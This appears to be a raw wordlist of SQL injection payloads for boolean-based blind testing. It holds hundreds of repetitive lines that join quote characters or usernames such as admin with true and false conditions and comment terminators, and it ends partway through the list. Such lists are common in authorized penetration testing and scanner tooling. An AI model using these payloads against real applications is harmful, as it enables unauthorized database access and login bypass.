 AND 1=0--
 AND 1=1--
 AND 1=0-- -;
 AND 1=1-- -;
 AND 1=0-- -
 AND 1=1-- -
 AND 1=0#
 AND 1=1#
 AND 1=0;
 AND 1=1;
 AND 1=0;#
 AND 1=1;#
 AND 1=0/*
 AND 1=1/*
 AND 1=0--
 AND 1=1--
 AND 1=0-- -;
 AND 1=1-- -;
 AND 1=0-- -
 AND 1=1-- -
 AND 1=0#
 AND 1=1#
 AND 1=0;
 AND 1=1;
 AND 1=0;#
 AND 1=1;#
 AND 1=0/*
 AND 1=1/*
 AND 1=0--
 AND 1=1--
 AND 1=0-- -;
 AND 1=1-- -;
 AND 1=0-- -
 AND 1=1-- -
 AND 1=0#
 AND 1=1#
 AND 1=0;
 AND 1=1;
 AND 1=0;#
 AND 1=1;#
 AND 1=0/*
 AND 1=1/*
 AND 1=0--
 AND 1=1--
 AND 1=0-- -;
 AND 1=1-- -;
 AND 1=0-- -
 AND 1=1-- -
 AND 1=0#
 AND 1=1#
 AND 1=0;
 AND 1=1;
 AND 1=0;#
 AND 1=1;#
 AND 1=0/*
 AND 1=1/*
' AND 1=0--
' AND 1=1--
' AND 1=0-- -;
' AND 1=1-- -;
' AND 1=0-- -
' AND 1=1-- -
' AND 1=0#
' AND 1=1#
' AND 1=0;
' AND 1=1;
' AND 1=0;#
' AND 1=1;#
' AND 1=0/*
' AND 1=1/*
' AND 1=0--
' AND 1=1--
' AND 1=0-- -;
' AND 1=1-- -;
' AND 1=0-- -
' AND 1=1-- -
' AND 1=0#
' AND 1=1#
' AND 1=0;
' AND 1=1;
' AND 1=0;#
' AND 1=1;#
' AND 1=0/*
' AND 1=1/*
' AND 1=0--
' AND 1=1--
' AND 1=0-- -;
' AND 1=1-- -;
' AND 1=0-- -
' AND 1=1-- -
' AND 1=0#
' AND 1=1#
' AND 1=0;
' AND 1=1;
' AND 1=0;#
' AND 1=1;#
' AND 1=0/*
' AND 1=1/*
' AND 1=0--
' AND 1=1--
' AND 1=0-- -;
' AND 1=1-- -;
' AND 1=0-- -
' AND 1=1-- -
' AND 1=0#
' AND 1=1#
' AND 1=0;
' AND 1=1;
' AND 1=0;#
' AND 1=1;#
' AND 1=0/*
' AND 1=1/*
" AND 1=0--
" AND 1=1--
" AND 1=0-- -;
" AND 1=1-- -;
" AND 1=0-- -
" AND 1=1-- -
" AND 1=0#
" AND 1=1#
" AND 1=0;
" AND 1=1;
" AND 1=0;#
" AND 1=1;#
" AND 1=0/*
" AND 1=1/*
" AND 1=0--
" AND 1=1--
" AND 1=0-- -;
" AND 1=1-- -;
" AND 1=0-- -
" AND 1=1-- -
" AND 1=0#
" AND 1=1#
" AND 1=0;
" AND 1=1;
" AND 1=0;#
" AND 1=1;#
" AND 1=0/*
" AND 1=1/*
" AND 1=0--
" AND 1=1--
" AND 1=0-- -;
" AND 1=1-- -;
" AND 1=0-- -
" AND 1=1-- -
" AND 1=0#
" AND 1=1#
" AND 1=0;
" AND 1=1;
" AND 1=0;#
" AND 1=1;#
" AND 1=0/*
" AND 1=1/*
" AND 1=0--
" AND 1=1--
" AND 1=0-- -;
" AND 1=1-- -;
" AND 1=0-- -
" AND 1=1-- -
" AND 1=0#
" AND 1=1#
" AND 1=0;
" AND 1=1;
" AND 1=0;#
" AND 1=1;#
" AND 1=0/*
" AND 1=1/*
user" AND 1=0--
user" AND 1=1--
user" AND 1=0-- -;
user" AND 1=1-- -;
user" AND 1=0-- -
user" AND 1=1-- -
user" AND 1=0#
user" AND 1=1#
user" AND 1=0;
user" AND 1=1;
user" AND 1=0;#
user" AND 1=1;#
user" AND 1=0/*
user" AND 1=1/*
admin" AND 1=0--
admin" AND 1=1--
admin" AND 1=0-- -;
admin" AND 1=1-- -;
admin" AND 1=0-- -
admin" AND 1=1-- -
admin" AND 1=0#
admin" AND 1=1#
admin" AND 1=0;
admin" AND 1=1;
admin" AND 1=0;#
admin" AND 1=1;#
admin" AND 1=0/*
admin" AND 1=1/*
adam" AND 1=0--
adam" AND 1=1--
adam" AND 1=0-- -;
adam" AND 1=1-- -;
adam" AND 1=0-- -
adam" AND 1=1-- -
adam" AND 1=0#
adam" AND 1=1#
adam" AND 1=0;
adam" AND 1=1;
adam" AND 1=0;#
adam" AND 1=1;#
adam" AND 1=0/*
adam" AND 1=1/*
test" AND 1=0--
test" AND 1=1--
test" AND 1=0-- -;
test" AND 1=1-- -;
test" AND 1=0-- -
test" AND 1=1-- -
test" AND 1=0#
test" AND 1=1#
test" AND 1=0;
test" AND 1=1;
test" AND 1=0;#
test" AND 1=1;#
test" AND 1=0/*
test" AND 1=1/*
user' AND 1=0--
user' AND 1=1--
user' AND 1=0-- -;
user' AND 1=1-- -;
user' AND 1=0-- -
user' AND 1=1-- -
user' AND 1=0#
user' AND 1=1#
user' AND 1=0;
user' AND 1=1;
user' AND 1=0;#
user' AND 1=1;#
user' AND 1=0/*
user' AND 1=1/*
admin' AND 1=0--
admin' AND 1=1--
admin' AND 1=0-- -;
admin' AND 1=1-- -;
admin' AND 1=0-- -
admin' AND 1=1-- -
admin' AND 1=0#
admin' AND 1=1#
admin' AND 1=0;
admin' AND 1=1;
admin' AND 1=0;#
admin' AND 1=1;#
admin' AND 1=0/*
admin' AND 1=1/*
adam' AND 1=0--
adam' AND 1=1--
adam' AND 1=0-- -;
adam' AND 1=1-- -;
adam' AND 1=0-- -
adam' AND 1=1-- -
adam' AND 1=0#
adam' AND 1=1#
adam' AND 1=0;
adam' AND 1=1;
adam' AND 1=0;#
adam' AND 1=1;#
adam' AND 1=0/*
adam' AND 1=1/*
test' AND 1=0--
test' AND 1=1--
test' AND 1=0-- -;
test' AND 1=1-- -;
test' AND 1=0-- -
test' AND 1=1-- -
test' AND 1=0#
test' AND 1=1#
test' AND 1=0;
test' AND 1=1;
test' AND 1=0;#
test' AND 1=1;#
test' AND 1=0/*
test' AND 1=1/*
user AND 1=0--
user AND 1=1--
user AND 1=0-- -;
user AND 1=1-- -;
user AND 1=0-- -
user AND 1=1-- -
user AND 1=0#
user AND 1=1#
user AND 1=0;
user AND 1=1;
user AND 1=0;#
user AND 1=1;#
user AND 1=0/*
user AND 1=1/*
admin AND 1=0--
admin AND 1=1--
admin AND 1=0-- -;
admin AND 1=1-- -;
admin AND 1=0-- -
admin AND 1=1-- -
admin AND 1=0#
admin AND 1=1#
admin AND 1=0;
admin AND 1=1;
admin AND 1=0;#
admin AND 1=1;#
admin AND 1=0/*
admin AND 1=1/*
adam AND 1=0--
adam AND 1=1--
adam AND 1=0-- -;
adam AND 1=1-- -;
adam AND 1=0-- -
adam AND 1=1-- -
adam AND 1=0#
adam AND 1=1#
adam AND 1=0;
adam AND 1=1;
adam AND 1=0;#
adam AND 1=1;#
adam AND 1=0/*
adam AND 1=1/*
test AND 1=0--
test AND 1=1--
test AND 1=0-- -;
test AND 1=1-- -;
test AND 1=0-- -
test AND 1=1-- -
test AND 1=0#
test AND 1=1#
test AND 1=0;
test AND 1=1;
test AND 1=0;#
test AND 1=1;#
test AND 1=0/*
test AND 1=1/*
 AND 0=0--
 AND 0=1--
 AND 0=0-- -;
 AND 0=1-- -;
 AND 0=0-- -
 AND 0=1-- -
 AND 0=0#
 AND 0=1#
 AND 0=0;
 AND 0=1;
 AND 0=0;#
 AND 0=1;#
 AND 0=0/*
 AND 0=1/*
 AND 0=0--
 AND 0=1--
 AND 0=0-- -;
 AND 0=1-- -;
 AND 0=0-- -
 AND 0=1-- -
 AND 0=0#
 AND 0=1#
 AND 0=0;
 AND 0=1;
 AND 0=0;#
 AND 0=1;#
 AND 0=0/*
 AND 0=1/*
 AND 0=0--
 AND 0=1--
 AND 0=0-- -;
 AND 0=1-- -;
 AND 0=0-- -
 AND 0=1-- -
 AND 0=0#
 AND 0=1#
 AND 0=0;
 AND 0=1;
 AND 0=0;#
 AND 0=1;#
 AND 0=0/*
 AND 0=1/*
 AND 0=0--
 AND 0=1--
 AND 0=0-- -;
 AND 0=1-- -;
 AND 0=0-- -
 AND 0=1-- -
 AND 0=0#
 AND 0=1#
 AND 0=0;
 AND 0=1;
 AND 0=0;#
 AND 0=1;#
 AND 0=0/*
 AND 0=1/*
' AND 0=0--
' AND 0=1--
' AND 0=0-- -;
' AND 0=1-- -;
' AND 0=0-- -
' AND 0=1-- -
' AND 0=0#
' AND 0=1#
' AND 0=0;
' AND 0=1;
' AND 0=0;#
' AND 0=1;#
' AND 0=0/*
' AND 0=1/*
' AND 0=0--
' AND 0=1--
' AND 0=0-- -;
' AND 0=1-- -;
' AND 0=0-- -
' AND 0=1-- -
' AND 0=0#
' AND 0=1#
' AND 0=0;
' AND 0=1;
' AND 0=0;#
' AND 0=1;#
' AND 0=0/*
' AND 0=1/*
' AND 0=0--
' AND 0=1--
' AND 0=0-- -;
' AND 0=1-- -;
' AND 0=0-- -
' AND 0=1-- -
' AND 0=0#
' AND 0=1#
' AND 0=0;
' AND 0=1;
' AND 0=0;#
' AND 0=1;#
' AND 0=0/*
' AND 0=1/*
' AND 0=0--
' AND 0=1--
' AND 0=0-- -;
' AND 0=1-- -;
' AND 0=0-- -
' AND 0=1-- -
' AND 0=0#
' AND 0=1#
' AND 0=0;
' AND 0=1;
' AND 0=0;#
' AND 0=1;#
' AND 0=0/*
' AND 0=1/*
" AND 0=0--
" AND 0=1--
" AND 0=0-- -;
" AND 0=1-- -;
" AND 0=0-- -
" AND 0=1-- -
" AND 0=0#
" AND 0=1#
" AND 0=0;
" AND 0=1;
" AND 0=0;#
" AND 0=1;#
" AND 0=0/*
" AND 0=1/*
" AND 0=0--
" AND 0=1--
" AND 0=0-- -;
" AND 0=1-- -;
" AND 0=0-- -
" AND 0=1-- -
" AND 0=0#
" AND 0=1#
" AND 0=0;
" AND 0=1;
" AND 0=0;#
" AND 0=1;#
" AND 0=0/*
" AND 0=1/*
" AND 0=0--
" AND 0=1--
" AND 0=0-- -;
" AND 0=1-- -;
" AND 0=0-- -
" AND 0=1-- -
" AND 0=0#
" AND 0=1#
" AND 0=0;
" AND 0=1;
" AND 0=0;#
" AND 0=1;#
" AND 0=0/*
" AND 0=1/*
" AND 0=0--
" AND 0=1--
" AND 0=0-- -;
" AND 0=1-- -;
" AND 0=0-- -
" AND 0=1-- -
" AND 0=0#
" AND 0=1#
" AND 0=0;
" AND 0=1;
" AND 0=0;#
" AND 0=1;#
" AND 0=0/*
" AND 0=1/*
user" AND 0=0--
user" AND 0=1--
user" AND 0=0-- -;
user" AND 0=1-- -;
user" AND 0=0-- -
user" AND 0=1-- -
user" AND 0=0#
user" AND 0=1#
user" AND 0=0;
user" AND 0=1;
user" AND 0=0;#
user" AND 0=1;#
user" AND 0=0/*
user" AND 0=1/*
admin" AND 0=0--
admin" AND 0=1--
admin" AND 0=0-- -;
admin" AND 0=1-- -;
admin" AND 0=0-- -
admin" AND 0=1-- -
admin" AND 0=0#
admin" AND 0=1#
admin" AND 0=0;
admin" AND 0=1;
admin" AND 0=0;#
admin" AND 0=1;#
admin" AND 0=0/*
admin" AND 0=1/*
adam" AND 0=0--
adam" AND 0=1--
adam" AND 0=0-- -;
adam" AND 0=1-- -;
adam" AND 0=0-- -
adam" AND 0=1-- -
adam" AND 0=0#
adam" AND 0=1#
adam" AND 0=0;
adam" AND 0=1;
adam" AND 0=0;#
adam" AND 0=1;#
adam" AND 0=0/*
adam" AND 0=1/*
test" AND 0=0--
test" AND 0=1--
test" AND 0=0-- -;
test" AND 0=1-- -;
test" AND 0=0-- -
test" AND 0=1-- -
test" AND 0=0#
test" AND 0=1#
test" AND 0=0;
test" AND 0=1;
test" AND 0=0;#
test" AND 0=1;#
test" AND 0=0/*
test" AND 0=1/*
user' AND 0=0--
user' AND 0=1--
user' AND 0=0-- -;
user' AND 0=1-- -;
user' AND 0=0-- -
user' AND 0=1-- -
user' AND 0=0#
user' AND 0=1#
user' AND 0=0;
user' AND 0=1;
user' AND 0=0;#
user' AND 0=1;#
user' AND 0=0/*
user' AND 0=1/*
admin' AND 0=0--
admin' AND 0=1--
admin' AND 0=0-- -;
admin' AND 0=1-- -;
admin' AND 0=0-- -
admin' AND 0=1-- -
admin' AND 0=0#
admin' AND 0=1#
admin' AND 0=0;
admin' AND 0=1;
admin' AND 0=0;#
admin' AND 0=1;#
admin' AND 0=0/*
admin' AND 0=1/*
adam' AND 0=0--
adam' AND 0=1--
adam' AND 0=0-- -;
adam' AND 0=1-- -;
adam' AND 0=0-- -
adam' AND 0=1-- -
adam' AND 0=0#
adam' AND 0=1#
adam' AND 0=0;
adam' AND 0=1;
adam' AND 0=0;#
adam' AND 0=1;#
adam' AND 0=0/*
adam' AND 0=1/*
test' AND 0=0--
test' AND 0=1--
test' AND 0=0-- -;
test' AND 0=1-- -;
test' AND 0=0-- -
test' AND 0=1-- -
test' AND 0=0#
test' AND 0=1#
test' AND 0=0;
test' AND 0=1;
test' AND 0=0;#
test' AND 0=1;#
test' AND 0=0/*
test' AND 0=1/*
user AND 0=0--
user AND 0=1--
user AND 0=0-- -;
user AND 0=1-- -;
user AND 0=0-- -
user AND 0=1-- -
user AND 0=0#
user AND 0=1#
user AND 0=0;
user AND 0=1;
user AND 0=0;#
user AND 0=1;#
user AND 0=0/*
user AND 0=1/*
admin AND 0=0--
admin AND 0=1--
admin AND 0=0-- -;
admin AND 0=1-- -;
admin AND 0=0-- -
admin AND 0=1-- -
admin AND 0=0#
admin AND 0=1#
admin AND 0=0;
admin AND 0=1;
admin AND 0=0;#
admin AND 0=1;#
admin AND 0=0/*
admin AND 0=1/*
adam AND 0=0--
adam AND 0=1--
adam AND 0=0-- -;
adam AND 0=1-- -;
adam AND 0=0-- -
adam AND 0=1-- -
adam AND 0=0#
adam AND 0=1#
adam AND 0=0;
adam AND 0=1;
adam AND 0=0;#
adam AND 0=1;#
adam AND 0=0/*
adam AND 0=1/*
test AND 0=0--
test AND 0=1--
test AND 0=0-- -;
test AND 0=1-- -;
test AND 0=0-- -
test AND 0=1-- -
test AND 0=0#
test AND 0=1#
test AND 0=0;
test AND 0=1;
test AND 0=0;#
test AND 0=1;#
test AND 0=0/*
test AND 0=1/*
 AND 1='0--
 AND 1='1--
 AND 1='0-- -;
 AND 1='1-- -;
 AND 1='0-- -
 AND 1='1-- -
 AND 1='0#
 AND 1='1#
 AND 1='0;
 AND 1='1;
 AND 1='0;#
 AND 1='1;#
 AND 1='0/*
 AND 1='1/*
 AND 1='0--
 AND 1='1--
 AND 1='0-- -;
 AND 1='1-- -;
 AND 1='0-- -
 AND 1='1-- -
 AND 1='0#
 AND 1='1#
 AND 1='0;
 AND 1='1;
 AND 1='0;#
 AND 1='1;#
 AND 1='0/*
 AND 1='1/*
 AND 1='0--
 AND 1='1--
 AND 1='0-- -;
 AND 1='1-- -;
 AND 1='0-- -
 AND 1='1-- -
 AND 1='0#
 AND 1='1#
 AND 1='0;
 AND 1='1;
 AND 1='0;#
 AND 1='1;#
 AND 1='0/*
 AND 1='1/*
 AND 1='0--
 AND 1='1--
 AND 1='0-- -;
 AND 1='1-- -;
 AND 1='0-- -
 AND 1='1-- -
 AND 1='0#
 AND 1='1#
 AND 1='0;
 AND 1='1;
 AND 1='0;#
 AND 1='1;#
 AND 1='0/*
 AND 1='1/*
' AND 1='0--
' AND 1='1--
' AND 1='0-- -;
' AND 1='1-- -;
' AND 1='0-- -
' AND 1='1-- -
' AND 1='0#
' AND 1='1#
' AND 1='0;
' AND 1='1;
' AND 1='0;#
' AND 1='1;#
' AND 1='0/*
' AND 1='1/*
' AND 1='0--
' AND 1='1--
' AND 1='0-- -;
' AND 1='1-- -;
' AND 1='0-- -
' AND 1='1-- -
' AND 1='0#
' AND 1='1#
' AND 1='0;
' AND 1='1;
' AND 1='0;#
' AND 1='1;#
' AND 1='0/*
' AND 1='1/*
' AND 1='0--
' AND 1='1--
' AND 1='0-- -;
' AND 1='1-- -;
' AND 1='0-- -
' AND 1='1-- -
' AND 1='0#
' AND 1='1#
' AND 1='0;
' AND 1='1;
' AND 1='0;#
' AND 1='1;#
' AND 1='0/*
' AND 1='1/*
' AND 1='0--
' AND 1='1--
' AND 1='0-- -;
' AND 1='1-- -;
' AND 1='0-- -
' AND 1='1-- -
' AND 1='0#
' AND 1='1#
' AND 1='0;
' AND 1='1;
' AND 1='0;#
' AND 1='1;#
' AND 1='0/*
' AND 1='1/*
" AND 1='0--
" AND 1='1--
" AND 1='0-- -;
" AND 1='1-- -;
" AND 1='0-- -
" AND 1='1-- -
" AND 1='0#
" AND 1='1#
" AND 1='0;
" AND 1='1;
" AND 1='0;#
" AND 1='1;#
" AND 1='0/*
" AND 1='1/*
" AND 1='0--
" AND 1='1--
" AND 1='0-- -;
" AND 1='1-- -;
" AND 1='0-- -
" AND 1='1-- -
" AND 1='0#
" AND 1='1#
" AND 1='0;
" AND 1='1;
" AND 1='0;#
" AND 1='1;#
" AND 1='0/*
" AND 1='1/*
" AND 1='0--
" AND 1='1--
" AND 1='0-- -;
" AND 1='1-- -;
" AND 1='0-- -
" AND 1='1-- -
" AND 1='0#
" AND 1='1#
" AND 1='0;
" AND 1='1;
" AND 1='0;#
" AND 1='1;#
" AND 1='0/*
" AND 1='1/*
" AND 1='0--
" AND 1='1--
" AND 1='0-- -;
" AND 1='1-- -;
" AND 1='0-- -
" AND 1='1-- -
" AND 1='0#
" AND 1='1#
" AND 1='0;
" AND 1='1;
" AND 1='0;#
" AND 1='1;#
" AND 1='0/*
" AND 1='1/*
user" AND 1='0--
user" AND 1='1--
user" AND 1='0-- -;
user" AND 1='1-- -;
user" AND 1='0-- -
user" AND 1='1-- -
user" AND 1='0#
user" AND 1='1#
user" AND 1='0;
user" AND 1='1;
user" AND 1='0;#
user" AND 1='1;#
user" AND 1='0/*
user" AND 1='1/*
admin" AND 1='0--
admin" AND 1='1--
admin" AND 1='0-- -;
admin" AND 1='1-- -;
admin" AND 1='0-- -
admin" AND 1='1-- -
admin" AND 1='0#
admin" AND 1='1#
admin" AND 1='0;
admin" AND 1='1;
admin" AND 1='0;#
admin" AND 1='1;#
admin" AND 1='0/*
admin" AND 1='1/*
adam" AND 1='0--
adam" AND 1='1--
adam" AND 1='0-- -;
adam" AND 1='1-- -;
adam" AND 1='0-- -
adam" AND 1='1-- -
adam" AND 1='0#
adam" AND 1='1#
adam" AND 1='0;
adam" AND 1='1;
adam" AND 1='0;#
adam" AND 1='1;#
adam" AND 1='0/*
adam" AND 1='1/*
test" AND 1='0--
test" AND 1='1--
test" AND 1='0-- -;
test" AND 1='1-- -;
test" AND 1='0-- -
test" AND 1='1-- -
test" AND 1='0#
test" AND 1='1#
test" AND 1='0;
test" AND 1='1;
test" AND 1='0;#
test" AND 1='1;#
test" AND 1='0/*
test" AND 1='1/*
user' AND 1='0--
user' AND 1='1--
user' AND 1='0-- -;
user' AND 1='1-- -;
user' AND 1='0-- -
user' AND 1='1-- -
user' AND 1='0#
user' AND 1='1#
user' AND 1='0;
user' AND 1='1;
user' AND 1='0;#
user' AND 1='1;#
user' AND 1='0/*
user' AND 1='1/*
admin' AND 1='0--
admin' AND 1='1--
admin' AND 1='0-- -;
admin' AND 1='1-- -;
admin' AND 1='0-- -
admin' AND 1='1-- -
admin' AND 1='0#
admin' AND 1='1#
admin' AND 1='0;
admin' AND 1='1;
admin' AND 1='0;#
admin' AND 1='1;#
admin' AND 1='0/*
admin' AND 1='1/*
adam' AND 1='0--
adam' AND 1='1--
adam' AND 1='0-- -;
adam' AND 1='1-- -;
adam' AND 1='0-- -
adam' AND 1='1-- -
adam' AND 1='0#
adam' AND 1='1#
adam' AND 1='0;
adam' AND 1='1;
adam' AND 1='0;#
adam' AND 1='1;#
adam' AND 1='0/*
adam' AND 1='1/*
test' AND 1='0--
test' AND 1='1--
test' AND 1='0-- -;
test' AND 1='1-- -;
test' AND 1='0-- -
test' AND 1='1-- -
test' AND 1='0#
test' AND 1='1#
test' AND 1='0;
test' AND 1='1;
test' AND 1='0;#
test' AND 1='1;#
test' AND 1='0/*
test' AND 1='1/*
user AND 1='0--
user AND 1='1--
user AND 1='0-- -;
user AND 1='1-- -;
user AND 1='0-- -
user AND 1='1-- -
user AND 1='0#
user AND 1='1#
user AND 1='0;
user AND 1='1;
user AND 1='0;#
user AND 1='1;#
user AND 1='0/*
user AND 1='1/*
admin AND 1='0--
admin AND 1='1--
admin AND 1='0-- -;
admin AND 1='1-- -;
admin AND 1='0-- -
admin AND 1='1-- -
admin AND 1='0#
admin AND 1='1#
admin AND 1='0;
admin AND 1='1;
admin AND 1='0;#
admin AND 1='1;#
admin AND 1='0/*
admin AND 1='1/*
adam AND 1='0--
adam AND 1='1--
adam AND 1='0-- -;
adam AND 1='1-- -;
adam AND 1='0-- -
adam AND 1='1-- -
adam AND 1='0#
adam AND 1='1#
adam AND 1='0;
adam AND 1='1;
adam AND 1='0;#
adam AND 1='1;#
adam AND 1='0/*
adam AND 1='1/*
test AND 1='0--
test AND 1='1--
test AND 1='0-- -;
test AND 1='1-- -;
test AND 1='0-- -
test AND 1='1-- -
test AND 1='0#
test AND 1='1#
test AND 1='0;
test AND 1='1;
test AND 1='0;#
test AND 1='1;#
test AND 1='0/*
test AND 1='1/*
 AND 0='0--
 AND 0='1--
 AND 0='0-- -;
 AND 0='1-- -;
 AND 0='0-- -
 AND 0='1-- -
 AND 0='0#
 AND 0='1#
 AND 0='0;
 AND 0='1;
 AND 0='0;#
 AND 0='1;#
 AND 0='0/*
 AND 0='1/*
 AND 0='0--
 AND 0='1--
 AND 0='0-- -;
 AND 0='1-- -;
 AND 0='0-- -
 AND 0='1-- -
 AND 0='0#
 AND 0='1#
 AND 0='0;
 AND 0='1;
 AND 0='0;#
 AND 0='1;#
 AND 0='0/*
 AND 0='1/*
 AND 0='0--
 AND 0='1--
 AND 0='0-- -;
 AND 0='1-- -;
 AND 0='0-- -
 AND 0='1-- -
 AND 0='0#
 AND 0='1#
 AND 0='0;
 AND 0='1;
 AND 0='0;#
 AND 0='1;#
 AND 0='0/*
 AND 0='1/*
 AND 0='0--
 AND 0='1--
 AND 0='0-- -;
 AND 0='1-- -;
 AND 0='0-- -
 AND 0='1-- -
 AND 0='0#
 AND 0='1#
 AND 0='0;
 AND 0='1;
 AND 0='0;#
 AND 0='1;#
 AND 0='0/*
 AND 0='1/*
' AND 0='0--
' AND 0='1--
' AND 0='0-- -;
' AND 0='1-- -;
' AND 0='0-- -
' AND 0='1-- -
' AND 0='0#
' AND 0='1#
' AND 0='0;
' AND 0='1;
' AND 0='0;#
' AND 0='1;#
' AND 0='0/*
' AND 0='1/*
' AND 0='0--
' AND 0='1--
' AND 0='0-- -;
' AND 0='1-- -;
' AND 0='0-- -
' AND 0='1-- -
' AND 0='0#
' AND 0='1#
' AND 0='0;
' AND 0='1;
' AND 0='0;#
' AND 0='1;#
' AND 0='0/*
' AND 0='1/*
' AND 0='0--
' AND 0='1--
' AND 0='0-- -;
' AND 0='1-- -;
' AND 0='0-- -
' AND 0='1-- -
' AND 0='0#
' AND 0='1#
' AND 0='0;
' AND 0='1;
' AND 0='0;#
' AND 0='1;#
' AND 0='0/*
' AND 0='1/*
' AND 0='0--
' AND 0='1--
' AND 0='0-- -;
' AND 0='1-- -;
' AND 0='0-- -
' AND 0='1-- -
' AND 0='0#
' AND 0='1#
' AND 0='0;
' AND 0='1;
' AND 0='0;#
' AND 0='1;#
' AND 0='0/*
' AND 0='1/*
" AND 0='0--
" AND 0='1--
" AND 0='0-- -;
" AND 0='1-- -;
" AND 0='0-- -
" AND 0='1-- -
" AND 0='0#
" AND 0='1#
" AND 0='0;
" AND 0='1;
" AND 0='0;#
" AND 0='1;#
" AND 0='0/*
" AND 0='1/*
" AND 0='0--
" AND 0='1--
" AND 0='0-- -;
" AND 0='1-- -;
" AND 0='0-- -
" AND 0='1-- -
" AND 0='0#
" AND 0='1#
" AND 0='0;
" AND 0='1;
" AND 0='0;#
" AND 0='1;#
" AND 0='0/*
" AND 0='1/*
" AND 0='0--
" AND 0='1--
" AND 0='0-- -;
" AND 0='1-- -;
" AND 0='0-- -
" AND 0='1-- -
" AND 0='0#
" AND 0='1#
" AND 0='0;
" AND 0='1;
" AND 0='0;#
" AND 0='1;#
" AND 0='0/*
" AND 0='1/*
" AND 0='0--
" AND 0='1--
" AND 0='0-- -;
" AND 0='1-- -;
" AND 0='0-- -
" AND 0='1-- -
" AND 0='0#
" AND 0='1#
" AND 0='0;
" AND 0='1;
" AND 0='0;#
" AND 0='1;#
" AND 0='0/*
" AND 0='1/*
user" AND 0='0--
user" AND 0='1--
user" AND 0='0-- -;
user" AND 0='1-- -;
user" AND 0='0-- -
user" AND 0='1-- -
user" AND 0='0#
user" AND 0='1#
user" AND 0='0;
user" AND 0='1;
user" AND 0='0;#
user" AND 0='1;#
user" AND 0='0/*
user" AND 0='1/*
admin" AND 0='0--
admin" AND 0='1--
admin" AND 0='0-- -;
admin" AND 0='1-- -;
admin" AND 0='0-- -
admin" AND 0='1-- -
admin" AND 0='0#
admin" AND 0='1#
admin" AND 0='0;
admin" AND 0='1;
admin" AND 0='0;#
admin" AND 0='1;#
admin" AND 0='0/*
admin" AND 0='1/*
adam" AND 0='0--
adam" AND 0='1--
adam" AND 0='0-- -;
adam" AND 0='1-- -;
adam" AND 0='0-- -
adam" AND 0='1-- -
adam" AND 0='0#
adam" AND 0='1#
adam" AND 0='0;
adam" AND 0='1;
adam" AND 0='0;#
adam" AND 0='1;#
adam" AND 0='0/*
adam" AND 0='1/*
test" AND 0='0--
test" AND 0='1--
test" AND 0='0-- -;
test" AND 0='1-- -;
test" AND 0='0-- -
test" AND 0='1-- -
test" AND 0='0#
test" AND 0='1#
test" AND 0='0;
test" AND 0='1;
test" AND 0='0;#
test" AND 0='1;#
test" AND 0='0/*
test" AND 0='1/*
user' AND 0='0--
user' AND 0='1--
user' AND 0='0-- -;
user' AND 0='1-- -;
user' AND 0='0-- -
user' AND 0='1-- -
user' AND 0='0#
user' AND 0='1#
user' AND 0='0;
user' AND 0='1;
user' AND 0='0;#
user' AND 0='1;#
user' AND 0='0/*
user' AND 0='1/*
admin' AND 0='0--
admin' AND 0='1--
admin' AND 0='0-- -;
admin' AND 0='1-- -;
admin' AND 0='0-- -
admin' AND 0='1-- -
admin' AND 0='0#
admin' AND 0='1#
admin' AND 0='0;
admin' AND 0='1;
admin' AND 0='0;#
admin' AND 0='1;#
admin' AND 0='0/*
admin' AND 0='1/*
adam' AND 0='0--
adam' AND 0='1--
adam' AND 0='0-- -;
adam' AND 0='1-- -;
adam' AND 0='0-- -
adam' AND 0='1-- -
adam' AND 0='0#
adam' AND 0='1#
adam' AND 0='0;
adam' AND 0='1;
adam' AND 0='0;#
adam' AND 0='1;#
adam' AND 0='0/*
adam' AND 0='1/*
test' AND 0='0--
test' AND 0='1--
test' AND 0='0-- -;
test' AND 0='1-- -;
test' AND 0='0-- -
test' AND 0='1-- -
test' AND 0='0#
test' AND 0='1#
test' AND 0='0;
test' AND 0='1;
test' AND 0='0;#
test' AND 0='1;#
test' AND 0='0/*
test' AND 0='1/*
user AND 0='0--
user AND 0='1--
user AND 0='0-- -;
user AND 0='1-- -;
user AND 0='0-- -
user AND 0='1-- -
user AND 0='0#
user AND 0='1#
user AND 0='0;
user AND 0='1;
user AND 0='0;#
user AND 0='1;#
user AND 0='0/*
user AND 0='1/*
admin AND 0='0--
admin AND 0='1--
admin AND 0='0-- -;
admin AND 0='1-- -;
admin AND 0='0-- -
admin AND 0='1-- -
admin AND 0='0#
admin AND 0='1#
admin AND 0='0;
admin AND 0='1;
admin AND 0='0;#
admin AND 0='1;#
admin AND 0='0/*
admin AND 0='1/*
adam AND 0='0--
adam AND 0='1--
adam AND 0='0-- -;
adam AND 0='1-- -;
adam AND 0='0-- -
adam AND 0='1-- -
adam AND 0='0#
adam AND 0='1#
adam AND 0='0;
adam AND 0='1;
adam AND 0='0;#
adam AND 0='1;#
adam AND 0='0/*
adam AND 0='1/*
test AND 0='0--
test AND 0='1--
test AND 0='0-- -;
test AND 0='1-- -;
test AND 0='0-- -
test AND 0='1-- -
test AND 0='0#
test AND 0='1#
test AND 0='0;
test AND 0='1;
test AND 0='0;#
test AND 0='1;#
test AND 0='0/*
test AND 0='1/*
 AND 1="0--
 AND 1="1--
 AND 1="0-- -;
 AND 1="1-- -;
 AND 1="0-- -
 AND 1="1-- -
 AND 1="0#
 AND 1="1#
 AND 1="0;
 AND 1="1;
 AND 1="0;#
 AND 1="1;#
 AND 1="0/*
 AND 1="1/*
 AND 1="0--
 AND 1="1--
 AND 1="0-- -;
 AND 1="1-- -;
 AND 1="0-- -
 AND 1="1-- -
 AND 1="0#
 AND 1="1#
 AND 1="0;
 AND 1="1;
 AND 1="0;#
 AND 1="1;#
 AND 1="0/*
 AND 1="1/*
 AND 1="0--
 AND 1="1--
 AND 1="0-- -;
 AND 1="1-- -;
 AND 1="0-- -
 AND 1="1-- -
 AND 1="0#
 AND 1="1#
 AND 1="0;
 AND 1="1;
 AND 1="0;#
 AND 1="1;#
 AND 1="0/*
 AND 1="1/*
 AND 1="0--
 AND 1="1--
 AND 1="0-- -;
 AND 1="1-- -;
 AND 1="0-- -
 AND 1="1-- -
 AND 1="0#
 AND 1="1#
 AND 1="0;
 AND 1="1;
 AND 1="0;#
 AND 1="1;#
 AND 1="0/*
 AND 1="1/*
' AND 1="0--
' AND 1="1--
' AND 1="0-- -;
' AND 1="1-- -;
' AND 1="0-- -
' AND 1="1-- -
' AND 1="0#
' AND 1="1#
' AND 1="0;
' AND 1="1;
' AND 1="0;#
' AND 1="1;#
' AND 1="0/*
' AND 1="1/*
' AND 1="0--
' AND 1="1--
' AND 1="0-- -;
' AND 1="1-- -;
' AND 1="0-- -
' AND 1="1-- -
' AND 1="0#
